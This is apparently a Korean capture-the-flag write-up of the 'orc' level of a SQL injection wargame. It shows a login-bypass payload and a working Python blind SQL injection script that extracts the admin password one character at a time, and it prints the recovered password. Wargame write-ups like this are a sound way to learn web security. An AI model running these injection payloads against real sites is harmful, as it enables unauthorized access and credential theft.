4. Orc

서론

---

NULL

진행과정

---

망설일 필요가 없다. 뭐 제한이 있는것도 아니니까. 싱글쿼터를 이용해 쿼터를 닫고 or 을 이용해서 id를 주자.

?pw=' or id='admin#

이걸 이용하면 hello admin을 얻을 수 있는데 이를, 페이로드라 하겠다.

맨 밑 구문인 if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");때문에 Blind SQLi를 시행해야된다.

이 블로그에서 작성한 모든 Blind SQLi Coding은 Python 2.7.12로 작성한 코드이다.

import httplib, urllib
 
conn = httplib.HTTPConnection("los.eagle-jump.org")
URL = "/orc_47190a4d33f675a601f8def32df2583a.php?pw="
Headers={"Cookie":"PHPSESSID=s3kvsj2f9dq4c4ke7b0qmfaic6"}
length = 0
PW = ""
 
for i in range(1, 30) :
    payload = "' or id='admin' and " + "length(pw)='"+str(i)+"#"
    conn.request("GET", URL+payload, "", Headers)
    k = conn.getresponse().read()
    if "Hello admin" in k :
        print "length = %d" % i
        length = i
        break
 
for i in range(1, length+1) :
    for j in range(48, 123) :
        payload = "' or id='admin' and " + "mid(pw,"+str(i)+",1)='"+ chr(j) +"#"
        conn.request("GET", URL+payload, "", Headers)
        k = conn.getresponse().read()
        if "Hello admin" in k :
            PW += chr(j)
            print "PW = %s" % PW
            break

?pw=295d5844

# REF

---

NULL